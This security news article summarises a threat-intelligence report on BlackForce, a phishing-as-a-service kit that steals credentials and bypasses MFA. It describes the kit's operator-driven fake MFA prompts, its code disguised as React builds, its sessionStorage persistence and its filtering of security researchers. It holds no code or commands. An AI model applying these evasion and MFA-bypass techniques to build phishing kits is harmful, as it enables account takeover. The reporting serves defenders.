BlackForce PhaaS Weaponizes React and Stateful Sessions to Bypass MFA & Steal Credentials

A sophisticated new player has entered the Phishing-as-a-Service (PhaaS) market, offering cybercriminals a powerful toolset designed to bypass modern security controls with alarming ease. Dubbed BlackForce, this rapidly evolving phishing kit has been spotted targeting major global brands including Disney, Netflix, and DHL, leveraging a deceptive “legitimate-looking” codebase to steal credentials and defeat Multi-Factor Authentication (MFA).

A new report from Zscaler ThreatLabz details the rise of BlackForce, which was first observed in August 2025. Sold openly on Telegram forums for a mere €200-€300, the kit has quickly iterated through multiple versions, transforming from a simple credential harvester into a resilient, stateful attack platform.

What makes BlackForce particularly dangerous is its ability to facilitate real-time attacks that circumvent standard security layers. “BlackForce is capable of stealing credentials and performing Man-in-the-Browser (MitB) attacks to steal one-time tokens and bypass multi-factor authentication (MFA),” the report states.

The attack chain relies on a live operator. Once a victim enters their initial credentials on a spoofed page, the attacker receives an alert. They then use a command-and-control (C2) panel to dynamically inject a fake MFA prompt into the victim’s browser. When the unsuspecting user enters their SMS or app-based code, the attacker captures it instantly to hijack the session in real time.

To evade detection, BlackForce camouflages its malicious nature by mimicking modern web development standards. Analysts discovered that the kit utilizes production builds of React and React Router, frameworks commonly used by legitimate enterprises.

“The most effective deception tactic used by the BlackForce phishing kit is its ‘legitimate-looking’ codebase,” researchers noted. In fact, “more than 99% of the malicious JavaScript file’s content consists of production builds of React and React Router, giving it a legitimate appearance” .

This camouflage is bolstered by “cache-busting” techniques, where filenames like index-[hash].js are used to force browsers to load new scripts, a practice standard in professional web development but weaponized here to evade static signatures.

Perhaps the most concerning finding is the speed of the kit’s development. In just a few months, the authors released versions 3, 4, and 5, introducing significant architectural shifts to improve resilience.

Earlier versions (V3) were “stateless,” meaning a simple page refresh by the victim could clear the stolen data from the browser’s memory, breaking the attack. However, newer versions (V4 and V5) have evolved to be “stateful.”

By leveraging the browser’s sessionStorage, the malware can now “persist credentials across the entire session, creating a seamless and resilient multi-stage attack that survives page reloads”. This ensures that even if a network error occurs, the attacker retains the stolen user data.

BlackForce employs aggressive filtering to ensure only viable victims reach the landing page. It uses server-side blocklists to filter out traffic from security vendors, web crawlers, and researchers. Later versions even enforce a “mobile-only” policy, rejecting desktop users entirely to dodge analysis tools that typically run on workstations .

“The authors of BlackForce are actively modifying and improving the phishing kit, as evidenced by the rapid release of multiple versions in a short period,” ThreatLabz concludes, warning organizations to adopt zero-trust architectures to limit the blast radius of such compromised accounts.

Related Posts:

• Catastrophic React Flaw (CVE-2025-55182, CVSS 10.0) Allows Unauthenticated RCE on Next.js and Server Components
• The Rise of Phishing-as-a-Service: How Cybercriminals are Outsourcing Attacks
• MFA Bypass Alert: AitM Phishing Surges with Industrialized PhaaS Kits Targeting Microsoft 365 & Google Accounts!